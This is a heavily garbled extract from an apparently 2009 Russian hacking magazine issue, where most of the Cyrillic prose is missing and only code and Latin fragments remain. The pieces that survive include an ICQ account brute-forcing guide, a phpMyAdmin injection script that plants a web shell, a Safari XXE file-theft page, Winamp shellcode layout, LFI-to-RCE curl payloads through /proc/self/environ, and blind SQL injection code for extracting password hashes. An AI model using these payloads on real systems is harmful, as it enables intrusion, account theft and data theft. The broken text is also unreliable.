#3, , , rand() Windows , ,
, .
srand (mt_srand).
, PHP, -
SEED 2^32(2^31).
,

PHP,
? PHP 5.2.6, SEED
()
. ,
. ?
RAND
IS NOT RAND
MOODLE 1.X RANDOM PASSWORD

RESET TOKEN VULNERABILITY
,
!
.
,
. , ?
,

mt_rand() SEED
mt_rand(). mt_srand()
, .
!
() mt_rand()mt_rand()mt_rand()...,
.
mt_srand() Keep-alive-

print mt_rand();. N-
mt_rand() mt_srand(),

mt_srand(SEED) ,
N- mt_rand() . SEED , () (N-1) mt_rand().
. ,
, ,
srand (mt_srand)
rand (mt_rand).

,
.
Joomla Weak Random Password Reset Token
Vulnerability.
joomla<=1.5.6 10-

.
10 . DSL- 3
. 1.5.7,
2^32 (crc32)
. , 10 , - . ,

mt_rand() \ .
Moodle 1.x mt_rand() Admin Reset
Password Exploit.
041
RAND
IS NOT RAND
RAND
IS NOT RAND
>>
RAND
IS NOT RAND
RAND
IS NOT RAND
RAND
IS NOT RAND
RAND
IS NOT RAND
RAND
IS NOT RAND
PHP GENERATE_SEED() WEAK RANDOM NUMBER SEED

VULNERABILITY
STEFAN ESSER: MT_SRAND AND NOT SO RANDOM

NUMBERS
JOOMLA WEAK RANDOM PASSWORD RESET TOKEN

VULNERABILITY
LOG EXPLOIT: JOOMLA WEAK RANDOM PASSWORD

RESET TOKEN VULNERABILITY

, mt_rand() SEED mt_srand().
, , .
srand(). , . 1.9.x .
, word1+num+word2,
num 0123456789, word1 word .
lib/wordlist.txt ( Web) 35 . , 35*10*35=12250
rand() srand().

.

str_shuffle(), srand().
rand() srand() ,
77^8. srand().
,
srand() mt_srand(). , .
mt_srand ((double) microtime() * 1000000); 1 . , 4 ., . ,
1 . . XMB 1.9.x mt_rand() Admin Reset Password
Exploit. .
Username + E-Mail
. e-mail
.
mt_rand Keep-alive- SEED mt_srand. SEED
.

. google.com/
codesearch?q=mt_srand(%5C%20|)+%5C(%20lang:php . , , , -, PHP.
-SEED, (
md5(microtime()) MySQL 'select
rand()' ..), SEED. , , .
PHP-. z
LOG EXPLOIT: XMB 1.9.11 RANDOM PASSWORD RESET VULNERABILITY
042
X 07 /127/ 09
>>
Easy Hack
R0ID
/ R0ID@MAIL.RU /
M0R0
/ M0R0@INBOX.RU /
MUXX
/ MUXX@BK.RU /
:
IM- QUTIM
ICQ-
:
ICQ .
, .
,
qutim , . ,
, :
1. oscarprotocol.cpp, :
@@ -46,7 +46,7 @@ oscarProtocol::oscarProtocol(const
QStri
connectionSocket = new QTcpSocket(this);
buffer = new icqBuffer(this);
buffer->open(QIODevice::ReadWrite);
- flapSeqNum = rand() % 0x8000;
+ flapSeqNum = 0x0000;
reqSeq = 0x0000;
keepAlive = true;
connectBos = false;
qutim
QByteArray seq;
- quint16 num = rand() % 0xffff;
+ quint16 num = 0x000;
seq[0] = num / 0x100;
seq[1] = num % 0x100;
return seq;
2. clientIdentification.cpp (87- ):
@@ -84,7 +84,7 @@
QByteArray clientIdentification::getSeqNumber() const
{
:
- ,
, - 6-/7- . , , , ,
. ,
/ icq- , ,
:). , .
,
ZBrute UBrute. , , . ZBrute, :
3.
Sequence Number 0. ,
biophreak,
.
, ,

.
, ,
. :
1. DVD ( ).
2. - , , C:\ZBrute.
3. :
C:\ZBrute\ZBrute.exe -o C:\ZBrute\settings.txt
*nix Windows

4/5 https-
044
, settings.txt ,
.
*nix-:
X 07 /127/ 09
>>
1. zbrute.c (
:).
2. gcc :
# gcc -lpthread zbrute.c -o zbrute
3. zbrute .
4. .
settings.txt.
, :
# Source file
sourcelist = 'C:\zbrute\source.txt' //-
# Good file
goodlist = 'C:\zbrute\gd.txt' //good-
:
# HTTPS proxy file
httpslist = 'C:\zbrute\proxy.txt' //-
# Socks5 proxy file
# socks5list = '' //5-
# Socks4 proxy file
# socks4list = '' //4-
# Threads amount
threads = 150 //
,
:). UBrute.
:
:

, , -
, , .
, :
? ? . ,
( :)) .
ExclusivePass NemeZz
.
- (,
asechka.ru - ):
web-hack.ru
grabberz.com
uiny.ru
:
3365
, 13.03.09

X 07 /127/ 09

UIN;Password

# gcc -pthread zbrute.c -o zbrute
1.
2. -
3. : :
,
,
,
,
4. , config.ini:
Http=http.txt // http-
Socks4=socks4.txt // 4-
Socks5=socks5.txt // 5-
Source=source.txt //-
Bad=bad.txt // -
Good=good.txt // - :
Thread=1000 //
5. Start .

,

, -
( )
, :
1.
2. , -
3. , .

.
4. ( )
5.
6.
, ,
:).

045
>>
:
/

:
,
. ,
. ,
autorun.inf, ,
. ,
autorun.inf.
. ,
Anti AutoRUN Slesh. :
FAT32

autorun.inf
/

AUTORUN INF 040 ( )
1. ,
.
2. (
FAT32, ).
3. autorun.inf.
4. /
AUTORUN INF.
: , ACUNETIX
WEB-
:
, , , . ,
, Acunetix , HTTP- .
, Acunetix
. ?
- , .
Acunetix
( ToolsExplorer HTTP Editor).
. ,
.
1. Privoxy http://sourceforge.net/project/downloading.
php?group_id=11118&filename=privoxy_3.0.12.zip&a=84641926.
2.
.
3. .
config.txt
filterfile user.filter
4. Acunetix.
user.filter
046
Anti AutoRUN
5. :
.
, , , :).
CLIENT-HEADER-FILTER: acunetix-control Removes Acunetix

headers.
s/Âcunetix-Product:\s*.*//i
s/Âcunetix-Scanning-agreement:\s*.*//i
s/Âcunetix-User-agreement:\s*.*//i
s/Âcunetix-Aspect:\s*.*//i
s/Âcunetix-aspect-password:\s*.*//i
s/Âcunetix-aspect-queries:\s*.*//i
5. .
user.action
{+client-header-filter{acunetix-control}}
/
6. Privoxy.
7. Acunetix Privoxy.
Settings, LAN Settings
:)
HTTP-:
Hostname localhost, Port 8118.

debug=64 config.txt Privoxy
. ,
,
,
, !
X 07 /127/ 09
>>
:
.NET-
THINAPP
:
.NET-,
. , , C#. ,
! , WinXP
, .
, , ,
ThinAPP.
1. .NET Framework 3.5 http://download.microsoft.com/
download/2/0/e/20e90413-712f-438c-988e-fdaa79a8ac3d/dotnetfx35.exe.
:)
2. , VMWare Workstation.
3. . Windows XP (
Zver DVD )!
4. VMWare Tools. , , .
5. - ThinAPP 6000 , :)
6. ThinAPP Ready.
7. ThinAPP Setup Capture, .
8. .NET framework.
9. ThinAPP.
cmd.exe. Sandbox Location USB Flash.
10. . .
.
11. ThinAPP Setup Capture / . , %programfiles%,
, ,
:
.NET- XENOCODE
:
, ThinApp:
.NET - .
... 150 . , - ? , ? , ! ,
Xenocode Postbuild! (, using)
, .NET
.
( ILDASM). ribbon (- office 2007). 2
25 ( Xenocode Postbuild v7.0.162).
1. application, .
2. output, compile application to native x86
executable image.
3. single application executable , xenocode .NET. Generate
diagnostic-mode executable.
, .
, .
4. Virtualize. Runtimes ,
. , xenocode
, .
5. Filesystem ,
. ,
X 07 /127/ 09
.
12. , build,
Browse Project.
13. package.ini.
RequiredAppLinks=..\dotnetfx35\dotnetfx35, ..\dotnetfx35 , .NET, dotnetfx35 , .
14. .
15. , .NET-
.
,
. , .NET cmd.exe (
9). cmd.exe
.NET-. !
.NET.bmp
DevExpress,
.NET. Application
Directory .
( ),
. Xenocode Application,
,
.NET!
, . ,
. , .
exe .
.NET.
cmd.exe. .NET, (
1). cmd.exe ,
.NET.
thinapp. , ,
.NET, .

, ,
, .
:
,
,
.
.NET
, ThinApp
unmanaged
. z
047
>>
FORB
/ FORB@GAMELAND.RU /
OBZOR KSPLOITOV
. . , ,
, , ? !
, , , . , , !
01

SAFARI 3.X
>> Brief
Macintosh! ,
MacOS (
, ). ,
Macintosh
Safari ? ,
, 3 ,
.
:
Safari , : FreeType,
LibPng, Apples Webkit. , MacOS-, ,
.
: ,
,
. , ,
.
, ,
MacOS ( , , :), DoS).
,
, FreeType, ,
cff_charset_compute_cids() ft_
smooth_render_generic().
, (
, ).
, ,
PNG- libpng. -
, ,
.
048
PNG, .
, -,
0day.
, , Apples
Webkit,
. XML XXE (XML eXternal Enttity
XML). ( )

XML-.
: DoS (
- /dev/urandom
Win-),
- (
). ,
Safari
(
).
>> Targets
Safari 4., iPhone,
. , - ,
, Apples WebKit. , webkit.org.
>> Exploit
Apples Webkit
Safari.
<!DOCTYPE doc [ <!ENTITY ent SYSTEM "file:///etc/
passwd"> ] >
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<html>
<body>
X 07 /127/ 09
Below you should see the content of a local file, stolen by this evil web page.
<p/>
&ent;
<script>
alert(document.body.innerHTML);
</script>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
, &ent; /etc/passwd,
.
Safari, https://
cevans-app.appspot.com/static/safaristealfilebug.xml (MacOS) https://
cevans-app.appspot.com/static/safaristealfilebugwin.xml (Windows).
>> SOLUTION
Safari 4.x .
02
PHPMYADMIN (/SCRIPTS/SETUP.PHP)
PHP CODE INJECTION EXPLOIT
>> Brief
.
: 4 phpMyAdmin, /scripts/setup.php. : phpMyAdmin (
mysql, , , ..) /config/config.inc.php. ,
,
- . ,
,
. , ,
Web-. ,
.
host , , phpinfo();//localhost.
, phpinfo().
, passthru()
Web- c.
, .
phpMyAdmin. -, , , . -,
scripts/setup.php, -
WINDOWS
X 07 /127/ 09
>>
(, ? :)) . -, config/
, config.inc.php
. -,
curl (
). , , phpMyAdmin 2.11.x
2.11.9.5 3.x 3.1.3.1 (
).
, phpMyadmin
. ,
30%,
Web-.
>> Exploit
exploit(),
.
function exploit {
postdata="token=$1&action=save&configuration="\
"a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22hos
t%27]="\
"%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost
%22%3bs:9:"\
"%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connec
t_type%22%3bs:3:"\
"%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22aut
h_type%22%3bs:6:"\
"%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&
eoltype=unix"
postdata2="token=$1&action=save&configuration=a:1:"\
"{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%2
7%5d="\
"%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20
%27%3cpre%3e%27%3b"\
"system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/
pre%3e%27%3b}"\
"if(\$_GET%5b%27p%27%5d){echo%20
%27%3cpre%3e%27%3beval"\
"(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/
pre%3e%27%3b}%3b//"\
"%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:
6:%22"\
"mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%
3bs:8:"\
"%22compress%22%3bb:0%3bs:9:%22auth_
type%22%3bs:6:%22config"\
"%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=
unix"
:)
049
>>

. ...
flag="/tmp/$(basename $0).$RANDOM.phpinfo.flag.html"
echo "[+] attempting to inject phpinfo() ..."
curl -ks -b $2 -d "$postdata" --url "$3/scripts/setup.
php" >/dev/null
if curl -ks --url "$3/config/config.inc.php" | grep
"phpinfo()" >/dev/null
then
curl -ks --url "$3/config/config.inc.php" >$flag
echo "[+] success! phpinfo() injected successfully!
output saved on $flag"
curl -ks -b $2 -d $postdata2 --url "$3/scripts/
setup.php >/dev/null
echo "[+] you *should* now be able to remotely run
shell commands and PHP code using your browser. i.e.:"
echo "
$3/config/config.inc.php?c=ls+-l+/"
echo "
$3/config/config.inc.php?p=phpinfo();"
echo "
please send any feedback/improvements for
this script to"\
"unknown.pentester<AT_sign__here>gmail.com"
else
, PoC.
IE/Firefox/Opera/Mozilla.
Acrobat Reader . , Adobe Reader.
? , PDF
- ( wget ) .
, .
%PDF-1.4
%
4 0 obj<</ProcSet[/PDF/Text]>>endobj
5 0 obj<</Length 1>>stream
endstream
endobj
3 0 obj<</Type/Page/Parent 2 0 R/Contents 5 0 R/MediaBox
[0 0 595 842]/Resources 4 0 R>>endobj
2 0 obj<</Type/Pages/Kids [3 0 R ]/Count 1 >>endobj
echo "[+] no luck injecting to $3/config/config.inc.

php :("
exit
fi
}
PHP- , .
securitylab.ru/poc/
extra/381413.php.
>> Targets:
phpMyAdmin 2.11.x 2.11.9.5 3.x
3.1.3.1 (
).
>> Solution
/scripts/
setup.php, /config Web-,
( ) phpMyAdmin
. :
sourceforge.net/projects/phpmyadmin.
03
ADOBE ACROBAT 9.1.1 STACK OVERFLOW

CRASH POC EXPLOIT
>> Brief
PoC .
, ,
Adobe Acrobat 9.1.1.
PoC-, . , -
050
X 07 /127/ 09
>>
...
6 0 obj<</S/JavaScript/JS ( 0
function Init { if $typeof this.info.ModDate ==
"object"$ { return true; }app.alert$[[[[[[[[.... *
4098 } Init\($; )>>endobj
1 0 obj<</Type/Catalog/Pages 2 0 R/OpenAction 6 0
R>>endobj
xref
07
0000000000 65535 f
0000020392 00000 n
0000000193 00000 n
0000000098 00000 n
0000000015 00000 n
0000000052 00000 n
0000000245 00000 n
trailer
<<
/Size 7
/Root 1 0 R
/ID [<c52946397fbfbe4d5492f9f411a983e2><c52946397fbfbe
4d5492f9f411a983e2>]
>>
startxref
20452
%%EOF
, init alert, 4098

. , . ,
, , , 10
. , PDF .
? , app.alert()
, , DoS. , ,
,
,
.
.
X 07 /127/ 09
LIBSNDFILE
>> Exploit
securitylab.ru/_download/exploits/2009/05/
adobe-reader-dos.pdf ... :).
>> Targets
Acrobat Reader, 9.1.1.
, PDF-, , .
>> Solution
get.adobe.com/reader.
.
051
>>
.maki-,
:
WINAMP
04
WINAMP BUFFER OWERFLOW

MULTIPLE EXPLOITS
>> Brief:
Windows-player Winamp Nullsoft.
,
.
1. , - . , .
, ( , ,
:)). Winamp .
voc_read_header() aiff_read_header(), libsndfile .voc- .aiff (-, ).
, ,
. ,
.voc .aiff- , Winamp .
, , . ,
(
;)).
2. : Winamp, ?. , , ,
, .
, ... , ? :)
,
MAKI ( gen_ff.dll). Maki , ,
Winamp, ( ,
..). , ,
.maki ,
. , ... .
,
.
.
payload
payload
payload
dll
payload
= "\x41*16756
+= "\x74\x06\x90\x90"
+= "\x32\x55\xF0\x12" # universal p/p/r in_mod.
+= shellcode # calc shellcode from metasploit

, .maki-.
52
052
.text:12094F62
.text:12094F62
.text:12094F65
.text:12094F68
.text:12094F69
.text:12094F6A
.text:12094F6B
.text:12094F71
.text:12094F72
stack
.text:12094F73
loc_12094F62:
mov ax, [ebx]
movsx edi, ax ; sign extension
inc ebx
push edi ; Size
inc ebx
lea eax, [ebp+MultiByteStr]
push ebx ; Src
push eax ; Dst, buffer is located in the
.text:120951E5
.text:120951E5
.text:120951E7
.text:120951EA
.text:120951ED
.text:120951F0
.text:120951F1
.text:120951F2
.text:120951F3
.text:120951F9
.text:120951FA
stack
.text:120951FB
loc_120951E5:
mov edi, [ebx]
add ebx, 4
mov ax, [ebx]
movsx esi, ax ; sign extension
inc ebx
push esi ; Size
inc ebx
lea eax, [ebp+var_10144]
push ebx ; Src
push eax ; Dst, buffer is located in the
call memmove
call memmove
Big Bento,
. mcvcore.maki
PROGRAMFILES/Winamp/Skins/Bento/Scripts. ,
, ?
! :).
>> Targets
:
1. libsndfile <= 1.0.20,
Winamp.
2. Winamp <= 5.55.
>> Solution
winamp.com .
,
. ,
.
>> Exploit:
, , .
. (securitylab.ru/poc/
extra/380450.php), (securitylab.ru/poc/extra/380454.
php).
05
PHP <= 5.2.9 LOCAL SAFEMOD BYPASS

EXPLOIT (WIN32)
>> Brief:
PHP,
safe_mode. ,
php.ini safe_mode , ..
X 07 /127/ 09
>>
, :)
safe_mode. , Windows-.
Windows?
, OS - PHP. .
*nix-like /usr/bin/php \usr\bin\php
( ,
), Windows . ,

(Remote OS Fingerprinting). ,
TTL, Windows Size,
, FTP Web-Server,
Windows .
, Abysssec
(abyssses.com), : php- cmd.
php cmd.bat ( , ).
:
$cmd = $_REQUEST[cmd];
if ($cmd){
$batch = fopen ("cmd.bat","w");
fwrite($batch,"$cmd>abysssec.txt"."\r\n");
fwrite($batch,"exit");
fclose($batch);
exec("\start cmd.bat");
echo "<center>";
echo "<h1>Abysssec.com PHP 5.x SafeMod Bypasser</h1>";
X 07 /127/ 09
echo "<textarea rows=20 cols=60>";

require("abysssec.txt");
echo "</textarea>";
echo "</center>";
, , safe_mode
\start cmd.bat, \.
cmd.bat, .
, , .
:).
>> Exploits
abysssec.com/safemod-windows.zip
milw0rm.com/sploits/2009-safemod-windows.zip.
( , ) s3curi7y.
org/local.php?id=7.
>> Targets:
PHP, ,
Windows-. OS,
.
>> Solution:
. , exec() ,
.z
053
>>
Module. netmod
ule
Some.dll
Module. netmod ule
logo.jpeg
logo.jpeg
RSA
M0R0 / M0R0@INBOX.RU /
.NET-
.NET Microsoft 2002 .
, 4- . , ,
. , ,
.
>>

.NET, , Microsoft
,

.
.NET Java,
,
. .NET

(Vista/2008/7) Microsoft. Microsoft ,
,

.
054
Hewlett-Packard Intel
CLI, C# C++/CLI (ECMA-335, ECMA-334, ECMA372, ).
Novell Mono,
.NET ,
. Microsoft .NET

Windows, , ,

. .NET
.
, C (C#) , ,
Basic VB.NET.
,
.
.
?
, CLI JIT.
, !
, (
Java,
).
,
-.
X 07 /127/ 09
>>
CRACKME

Microsoft MSIL (Microsoft
Intermediate Language), CIL (Common
Intermediate Language) , , IL.
CLR (Common Language Runtime)
- ,
.
JIT (Just-In-Time),

.
, .NET- .
Windows.Forms, MessageBox
Hello, World .
, ?
? . ,
. .

.
.
TranslateMessage
(WM_LBUTTONUP: MSG == 202).
,
MessageBox
. ,
,
.NET-. ,
-.
-:
ILASM ILDASM

.
, IL?
,
X 07 /127/ 09
.
Microsoft
ILDASM. (,
, ). ILDASM Visual
Studio, , , .
(
vsvars32.bat) ildasm.
.
, IL-.
, . File Dump

Sample1.il. ILASM
( ): ilasm Sample1.il.
exe,
.
:
IL-;
;
aka ;
IL-.

, IL. ,
IL, ,
. ,
, ,
. .
. ,
,
: ,
, .
Visual Studio, , Microsoft
IL. , , .
,

IL-
IL, . : DILE ILIDE#.
,
. , ( ).

. , ILDASM, ( IDE).
SharpDevelop,
IL.
MonoDevelop,
, , ,
. SharpDevelop:

.
,
.
.

.
:
.assembly
,
;
.method ;
.entrypoint ,
;
.maxstack
;
.locals
.
055
>>

.NET-
IL-
HTTP://WWW
links

IL MSDN:
http://msdn.
microsoft.com/enus/library/system.
reflection.emit.
opcodes_fields.aspx

.NET-?
:
www.codewall.net
www.chilkatsoft.
com/dotNetCrypt.asp
www.eziriz.com
www.xheo.com/
products/codeveil/
default.aspx
Common Language Infrastructure (CLI), Partition II: Metadata

Definition and Semantics .

. MSDN (http://
msdn.microsoft.com/en-us/library/system.reflection.emit.
opcodes.ldlen.aspx). ,
. MSIL . - ,
, , .
, stdcall cdecl,
, .

ld , ldloc
, ldstr
.
st (store), .
, . ( init()

) Write.
, .
call, Write System.Console mscorlib.
, , .
, call instance.
callvirt. ReadLine,
, .
()
box32. .
.
IL
b ( branch). MSDN.
cracking .NET.
, . , ,
, .
app14 .
,
, .
- .
: IL Red Gates .NET Reflector
Reflexil. , IL
, .

. , Reflector .
Encrypt , ,
goes. Encrypt , ,
. ,
. :
object EventArgs.
,
vla_Click. Disassemble
c#!

. , , , ,
.
, -
, . , -

.
,

. ,

,
. .
? - .
056
X 07 /127/ 09
>>
LOG EXPLOIT: XMB 1.9.11 RANDOM PASSWORD RESET VULNERABILITY
REFLECTOR C#
CrackMe
private void vla_Click(
object sender,
EventArgs e)
{
int[] numArray = new int[12];
VariantType type = (VariantType)
Conversions.ToInteger(
MyProject.Computer.Registry.GetValue(
@"HKEY_CURRENT_USER\valid", "", 0));
decimal num = new decimal(((((double) type)
+ 1.5) * ((double) type)) + 0.025);
if (this.txt.Text == "somerandomvl")
{
Interaction.MsgBox(RuntimeHelpers.
GetObjectValue(Encrypt.
ParseandDecrypt(Conversions.
ToString(Encrypt.ParseandEncrypt(
"ydXX!if not txt is blah youfailed")))),
MsgBoxStyle.Exclamation, "585mfg9gf");
}
else
{
Interaction.MsgBox(RuntimeHelpers.
X 07 /127/ 09
GetObjectValue(Encrypt.ParseandDecrypt(
"ydXX!if not txt is blah youfailed")),
MsgBoxStyle.Exclamation, "585mfg9gf");
WARNING
}
if (Convert.ToDouble(num) == (((((double)
type) + 1.5) * ((double) type)) + 0.025))
{
if ((type == VariantType.Empty) |
(MyProject.Application.Info.DirectoryPath.
Length.ToString().Length == 0x1ca))
{
Interaction.MsgBox("nope",
MsgBoxStyle.Information, "sorry");
}
else if ((((this.txt.Text != this.txt.
Text) & false) | false) | (type == VariantType.
Null))
{
this.txt.Text = Conversions.ToString(
Encrypt.ParseandDecrypt(
"fm`{f}kpwrn"));
}
}
}
warning

Xenocode
PostBuild (http://
www.xenocode.com/
products/postbuildfor-net),

.
057
>>
SHARPDEVELOP
- , .

this.txt.Text = Conversions.ToString(Encrypt.
ParseandDecrypt("fm`{f}kpwrn"));.
,
, fm`{f}kpwrn.
ParseandDecrypt Encrypt.
(
?),
,
.
reflexil Tools IL-.
if
. IL
,
. .
,
MessageBox nope.

IL_00f2: ldc.i4
0x1ca
IL_00f7: ceq
IL_00f9: or
IL_00fa: brfalse.s IL_0110
058
IL_00fc: ldstr
"nope"
IL_0101: ldc.i4.s 64
IL_0103: ldstr
"sorry"
IL_0108: call
valuetype
[Microsoft.VisualBasic]Microsoft.
VisualBasic.MsgBoxResult
[Microsoft.VisualBasic]
Microsoft.VisualBasic.
Interaction::MsgBox(object,
valuetype [Microsoft.VisualBasic]
Microsoft.VisualBasic.MsgBoxStyle,
object)
brfalse brtrue, , else if,

IL_0110 IL_013d.

IL_013d: ldarg.0
IL_013e: callvirt instance class
[System.Windows.Forms]System.
Windows.Forms.TextBox app14.
goes::get_txt()
IL_0143: ldstr
"fm`{f}kpwrn"
IL_0148: call
object app14.Encr
ypt::ParseandDecrypt(string)
IL_014d: call
string
[Microsoft.VisualBasic]Microsoft.
VisualBasic.CompilerServices.
Conversions::ToString(object)
IL_0152: callvirt instance void
[System.Windows.Forms]System.
Windows.Forms.TextBox::set_
Text(string)
IL_0157: ret
,
Save as
app14_patched. ,

ihatethereg!!!

?
, . ( )
,
Microsoft.

.
, .
. Visual Studio
Dotfuscator.

, ,
X 07 /127/ 09
>>

. ,
. ,
a, b
,
. , .
. ,
. .
CodeVeil XHEO.
! Reflector.
-, : Module does not contain CLI header.
Reflector, ILDASM
.NET-. , Professional-
1200 , Dont just confuse
hackers. Stop them. !
. .
CLR, , . WinHex (Tools Open Ram;
). :
CTRL+A, Edit Copy All Into New File
app14_unveiled.exe.
. , - .
Reflector , , ; ,
Reflexil, . ILDASM,
X 07 /127/ 09
IL
. !
,
CodeVeil 3.2, , ,
.
. , unpacker
. ,
, , .
,
. ,

Application.Load. ,
Assembler. ThinApp Xenocode.
.
DVD
dvd

, CIL
Microsoft,
CrackMe .

, .
, , ,
www.wechall.net,
25- . 5
-! : - .
.
!z
059
>>
/ ICQ 884888, HTTP://WAP-CHAT.RU /

LOCAL REMOTE FILE INCLUDE
: ?
, :
-, /tmp,
, .... ,
!
.
>>
DATA

.
Data (
060
RFC 2397, ,
, ).
, , php (php>=5.2.0
data ) :
<?php
$dir = $_GET['dir'];
// -
$dir = str_replace(array('http://',
'ftp://','/','.'), '', $dir);
X 07 /127/ 09
>>
PHPINFO() DATA
ADVISORY PHP
FILEPATH TRUNCATION
//
$dir .= '/pages/default.php';
//,
include($dir . '/pages/default.
php');
?>
, . , ,
"http://", "ftp://",
!

RFI
,
( ,
PHP allow_url_include, , On):
http://localhost/index.
php?dir=data:,<?php eval($_
REQUEST[cmd]); ?>&cmd=phpinfo();

phpinfo()! ,

?
<?php
...
//
$dir = str_replace(array('_',']
','[',')','(','$','http://','ft
p://','/','.'), '', $dir);
$dir = htmlspecialchars($dir);
...
?>
X 07 /127/ 09
/PROC/SELF/FD
, HTTPD
, php-
( ),
, evil-.
- .
data ,
base64 (, +, =, ,
base64- ).
http://localhost/index.php?dir=dat
a:;base64,PD9waHAgZXZhbCgkX1JFUVVF
U1RbY21kXSk7ID8+&cmd=phpinfo();
("+" url-
"%2b")
phpinfo()!

RFI. .
/PROC/SELF/ENVIRON
, (http://
site.com) php-:
<?php
$page = $_GET['page'];
include('./pages/'.$page);
?>
,
/ ,
, /tmp
. .
?
LFI .
, /proc/self/
environ! ,
php- ,
. *nix-
/proc, /
proc/self, ,
,
.
evil- /proc/self/
environ,
LFI :). ?
, , :
evil- /
proc/self/environ?
! ,
, /proc/self/environ.

. /
proc/self/environ, useragent,
:
PATH=/sbin:/usr/sbin:/bin:/usr/
bin:/usr/X11R6/bin:/usr/bin:/bin
SERVER_ADMIN=admin@site.com
...
Mozilla/5.0 (Windows; U; Windows NT
5.1; en-US; rv:1.9.0.4)
Gecko/2008102920 Firefox/3.0.4
HTTP_KEEP_ALIVE=150
...
<?php eval($_
GET[cmd]); ?> :
curl "http://site.com/index.php?p
age=../../../../../../../../proc/
self/environ&cmd=phpinfo();" -H
061
>>
/PROC/SELF/
STATUS
/PROC/SELF/ENVIRON
"User-Agent: <?php eval(\$_GET[cmd]); ?>"
HTTP://WWW
links
ru.php.net/manual/
ru/wrappers.data.php
Data (RFC
2397)
php.
en.wikipedia.org/wiki/
Data_URI_scheme

.
ush.it/2008/08/18/
lfi2rce-localfile-inclusionto-remote-codeexecution-advancedexploitation-procshortcuts proc
shortcuts.
milw0rm.com/
papers/260
LFI/RFI.
itbloggen.se/cs/
blogs/secteam/
archive/2009/01/26/
alternative-waysto-exploit-PHPremote-file-includevulnerabilities.aspx
mail.
ush.it/2009/02/08/
php-filesystemattack-vectors php-filesystem.
raz0r.name/articles/
null-byte-alternative

.
, phpinfo() . /proc/self/environ
:
2. , id
PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/
X11R6/bin:/usr/bin:/bin
SERVER_ADMIN=admin@site.com
...
<?php eval($_GET[cmd]); ?> HTTP_KEEP_
ALIVE=150
...
, ,
evil-
( /proc/self/environ ). , ,
.
, !
,
, .
access_log
error_log? , ,
, !
/proc,

apache.
:
1. id
/proc/%{PID}/fd/%{FD_ID}
: %{PID} ( , /
proc/self/status), %{FD_ID}
( 2 7 ).
:
http://site.com/index.php?page=../../../../.
./../../../proc/self/status
, %{PID} 1228,
:
062
curl "http://site.com/index.php?page
=../../../../../../../../proc/1228/
fd/2&cmd=phpinfo();" -H "User-Agent: <?php
eval(\$_GET[cmd]); ?>"
curl "http://site.com/index.php?page
=../../../../../../../../proc/self/
fd/2&cmd=phpinfo();" -H "User-Agent: <?php
eval(\$_GET[cmd]); ?>"
, self
, %{PID}
. , LFI ,
, ,
.

,
LFI.
!
, secteam
e-mail!
, -
, - ..
.
.
LFI mail :
1. - .
2. - (, about), , evil-php
, .
3. e-mail www-data@
localhost (www-data , httpd;
, apache, wwwrun,
nobody, wwwdata ..).
, /var/mail (
/var/spool/mail) httpd.
:
X 07 /127/ 09
>>
curl "http://site.com/index.php?page=
../../../../../../../../var/mail/wwwdata&cmd=phpinfo();"
, , mail-
, ( ,
).
NULL-
,
,
:
<?php
$page = $_GET['page'];
// " "
if (!get_magic_quotes_gpc())
$page = addslashes($page);
include('./pages/'.$page.'.php');
?>
? , %00 .php.
( - ?)
php, sla.ckers.org
barbarianbob.
, php
-
/ /., ,
,
(
MAXPATHLEN). ,
, ,
.
LFI, :
, .
3. 2 :
<?php
...
include('./pages/../../../../../../../../
proc/self/environ/////////////[ ]');
...
?>
,
php , , ,
LFI!
<?php
...
include('./pages/../../../../../../../../
proc/self/environ');
...
?>

php-.
<?php
//
$file_for_include = 'work.txt';
for($i=1;$i<=4096;$i++)
{
$its_work = file_get_contents('http://
localhost/test/'.$file_for_include.str_
repeat('/',$i).'.php');
if($its_work=='1')
{
print ' : '.$i;
break;
curl "http://site.com/index.php?page=../../..
/../../../../../proc/self/environ///////////
[4096 ]////////&cmd=phpinfo();" -H
"User-Agent: <?php eval(\$_GET[cmd]); ?>"
phpinfo(); - .
1.
<?php
...
include('./pages/../../../../../../../../
proc/self/environ//////////[4096 ]////.php');
...
?>
2. ,
MAXPATHLEN (,
4096; , ,
200 , ), ,
(
.php), php, X 07 /127/ 09
}
}
?>
INFO
info

.
LFI/RFI
Local/Remote File
Include

php.
WARNING
warning
! ,

!
DVD
dvd

,
,
.

work.txt .
,
,
.

.
,

.
...
,
. php, php! , ,
, ,
. Null-
,
, RFI ,
ftp http... ? .
, :). z
063
>>
QWAZAR / HRONOUS@MAIL.RU /
BLIND SQL INJECTION
>>
, SQL-,
.
, . ?
,
SQL-.
Blind SQL
Injection ,
.

.
,

.
.
064

,

. MD5 512
,
. .

:
for($i=1;$i<=32;$i++)
for($j=1;$j<=255;$j++){
$res = send(
$url,
"sql.php?id=if(ascii(substring((se
lect+passhash+from+users+where+id=
0),$i,1))=$j,(select+1+union+selec
t+2),'1')"
);
if(!preg_match('/Subquery
X 07 /127/ 09
>>
48 , !

IL-

:)
returns/', $res) {
echo $j;
continue;
}
}

ASCII-
. , ,
.
.
, . .
,
. ,
? .
()

, , .
.
X 07 /127/ 09

, ,
SQL-.
:
1.
( MD5 [0-9,a-f])

,
2. ,
,

,
,

1
3. ,

1
4. ,

, , :
function getChar($url, $field,
$pos, $lb=0, $ub=255) {
while(true) {
$M = floor($lb + ($ub-$lb)/2);
if(cond($url, $field, '<', $pos,
$M)==1) {
$ub = $M 1;
}
else if(cond($url, $field, '>',
$pos, $M)==1) {
$lb = $M + 1;
}
else
return chr($M);
if($lb > $ub)
return -1;
}
}

MD5- . :
1. : 0,1,2,3,4,5,6,7,
8,9,a,b,c,d,e,f.
065
>>
REGEXP
MYSQL
FIND_IN_SET
2. : 'b'.
:
